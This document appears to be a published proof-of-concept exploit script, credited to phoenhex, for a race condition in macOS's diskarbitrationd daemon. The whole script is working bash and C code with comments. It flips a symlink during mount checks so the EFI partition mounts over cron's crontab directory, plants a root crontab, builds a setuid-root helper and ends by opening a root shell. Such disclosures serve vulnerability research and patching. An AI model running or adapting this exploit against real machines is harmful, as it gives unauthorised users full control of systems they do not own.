Apple macOS - Disk Arbitration Daemon Race Condition
Source: https://phoenhex.re  Author: phoenhex  Published: 2017-06-13
#!/bin/bash

# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
#
# Local privilege escalation through a race in diskarbitrationd: the daemon
# validates the requested mount point and then performs the mount as separate
# steps, so a symlink on that path which is swapped between the check and the
# mount lets a non-root user mount a volume onto a directory they could never
# write to directly. The volume used here is the FAT-formatted EFI system
# partition, which is writable by the mounting user once mounted, and the
# directory is cron's crontab spool, so a crontab for root can be planted and
# cron runs its command as root.

# diskarbitrationd only honours the mount request if the caller holds the
# system.volume.internal.mount authorization right, so bail out early if it
# cannot be acquired.
if ! security authorize system.volume.internal.mount &>/dev/null; then
  echo >&2 "Cannot acquire system.volume.internal.mount right. This will not work."
  exit 1
fi

TARGET=/private/var/at   # /var/at/tabs is where cron keeps crontabs on macOS
SUBDIR=tabs
DISK=/dev/disk0s1        # the EFI system partition: FAT, not normally mounted

TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR

# Helper that cron will later make setuid root: it switches to uid/gid 0 and
# runs the command given as its only argument.
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
  assert(argc == 2);
  setuid(0);
  setgid(0);
  system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1

# Race thread: keep flipping $TMPDIR/link between a harmless directory we own
# (so the mount point passes diskarbitrationd's check) and $TARGET (so the
# actual mount lands on /private/var/at/tabs).
race_link() {
  mkdir -p mounts

  while true; do
    ln -snf mounts link
    ln -snf $TARGET link
  done
}

# Mount thread: repeatedly ask diskarbitrationd to mount $DISK at
# $TMPDIR/link/$SUBDIR, unmounting again whenever it ended up in the wrong
# place, until df shows it mounted under $TARGET.
race_mount() {
  while ! df -h | grep $TARGET >/dev/null; do
    while df -h | grep $DISK >/dev/null; do
      diskutil umount $DISK &>/dev/null
    done
    while ! df -h | grep $DISK >/dev/null; do
      diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
    done
  done
}

cleanup() {
  echo "Killing child process $PID and cleaning up tmp dir"
  kill -9 $PID
  rm -rf $TMPDIR
}

# The mount loop relies on $DISK starting out unmounted.
if df -h | grep $DISK >/dev/null; then
  echo >&2 "$DISK already mounted. Exiting."
  exit 1
fi

race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount

# The EFI volume now sits on /var/at/tabs and is writable by us, so a crontab
# for root can be dropped there. It fires every minute and installs the
# setuid-root helper into $TMPDIR.
echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root

# Wait for cron to run the job as root.
while ! [ -e $TMPDIR/boom ]; do
  sleep 1
done

# Stop the symlink flipper, then use the setuid helper to remove the planted
# crontab, detach the EFI volume, clean up and hand over a root shell.
echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
 